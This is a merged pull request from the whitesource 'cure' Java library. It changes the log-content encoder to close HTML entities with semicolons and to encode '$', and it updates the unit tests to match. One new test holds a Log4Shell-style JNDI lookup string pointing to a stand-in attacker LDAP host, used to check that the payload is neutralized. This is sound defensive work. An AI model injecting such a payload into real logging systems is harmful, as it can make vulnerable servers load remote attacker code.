Merge pull request #15 from whitesource/BS/Feat/LogDenyListEnhancement

Implemented encoding of "$" in the log deny list encoder
whitesource · Jan 18, 2022 · bc82b8c · bc82b8c
2 parents a376d79 + ef73a99
commit bc82b8c
Show file tree

Hide file tree

Showing 2 changed files with 17 additions and 6 deletions.
diff --git a/src/main/java/io/whitesource/cure/Encoder.java b/src/main/java/io/whitesource/cure/Encoder.java
@@ -149,8 +149,9 @@ public static String forLogContent(Object content) {
     }
     return formatToString(content)
             .replaceAll("[\n|\r|\t]", "_")
-            .replaceAll("<", "&lt")
-            .replaceAll(">", "&gt");
+            .replaceAll("<", "&lt;")
+            .replaceAll(">", "&gt;")
+            .replaceAll("[$]", "&dollar;");
   }
 
   /**

diff --git a/src/test/java/io/whitesource/cure/EncodersTests.java b/src/test/java/io/whitesource/cure/EncodersTests.java
@@ -51,7 +51,7 @@ void forCrlf_null_successfully() {
   void forLogContent_oneElementArray_successfullyWithResult() {
 
     String[] oneElementStringArray = new String[] {"Barbi\n\r\t><"};
-    String[] expectedEncodedArray = new String[] {"Barbi___&gt&lt"};
+    String[] expectedEncodedArray = new String[] {"Barbi___&gt;&lt;"};
 
     String[] actualEncodedArray = Encoder.forLogContent(oneElementStringArray);
     Assertions.assertArrayEquals(expectedEncodedArray, actualEncodedArray);
@@ -62,7 +62,7 @@ void forLogContent_oneElementArray_successfullyWithResult() {
   void forLogContent_threeElementArray_successfullyWithResult() {
 
     String[] threeElementStringArray = new String[] {"I\n\r\t", "am>", "Barbi<"};
-    String[] expectedEncodedArray = new String[] {"I___", "am&gt", "Barbi&lt"};
+    String[] expectedEncodedArray = new String[] {"I___", "am&gt;", "Barbi&lt;"};
 
     String[] actualEncodedArray = Encoder.forLogContent(threeElementStringArray);
     Assertions.assertArrayEquals(expectedEncodedArray, actualEncodedArray);
@@ -77,7 +77,7 @@ void forLogContent_collection_successfullyWithResult() {
     results.add("I\n\r\t");
     results.add("am>");
 
-    String[] expectedEncodedArray = new String[] {"I___", "am&gt", "Barbi&lt"};
+    String[] expectedEncodedArray = new String[] {"I___", "am&gt;", "Barbi&lt;"};
 
     List<String> actualEncodedArray = Encoder.forLogContent(results);
     Assertions.assertEquals(actualEncodedArray.iterator().next(), Arrays.stream(expectedEncodedArray).iterator().next());
@@ -87,7 +87,7 @@ void forLogContent_collection_successfullyWithResult() {
   void forLogContent_fullEncodingCapabilities_successfullyWithResult() {
 
     String barbi = "Barbi\n\r\t><";
-    String expected = "Barbi___&gt&lt";
+    String expected = "Barbi___&gt;&lt;";
 
     String actual = forLogContent(barbi);
     Assertions.assertEquals(expected, actual);
@@ -99,6 +99,16 @@ void forLogContent_null_successfully() {
     Assertions.assertNull(forLogContent((Object) null));
   }
 
+  @Test
+  void forLogContent_actual_tainted_log4j_successfully() {
+
+    String barbi = "${jndi:ldap://attacker-srv.com/foo}";
+    String expected = "&dollar;{jndi:ldap://attacker-srv.com/foo}";
+
+    String actual = forLogContent(barbi);
+    Assertions.assertEquals(expected, actual);
+  }
+
   @Test
   void forHtmlAttributeXss_successfullyWithResult_array() {
     char[] chars = {'a', 'b', 'c', 'd', 'e', '<', '>'};